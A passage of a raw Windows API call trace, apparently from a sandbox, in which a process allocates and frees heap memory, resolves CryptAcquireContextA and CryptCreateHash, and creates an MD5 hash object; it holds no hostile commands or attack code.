1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0232.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0232.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0232.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0232.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0232.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0232.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0232.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0232.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0232.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0232.053] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0232.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0232.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0232.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0232.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0232.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0232.054] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0232.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0232.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0232.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0232.055] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0232.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.056] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0232.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0232.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.057] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.057] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0232.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0232.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0232.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0232.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.057] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.058] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0232.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0232.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.058] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.059] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.059] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0232.059] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0232.059] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.059] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.059] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0232.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.059] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0232.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.060] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0232.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0232.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0232.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e513a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0232.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0232.060] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0232.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0232.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0232.061] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0232.061] RtlAllocateHeap 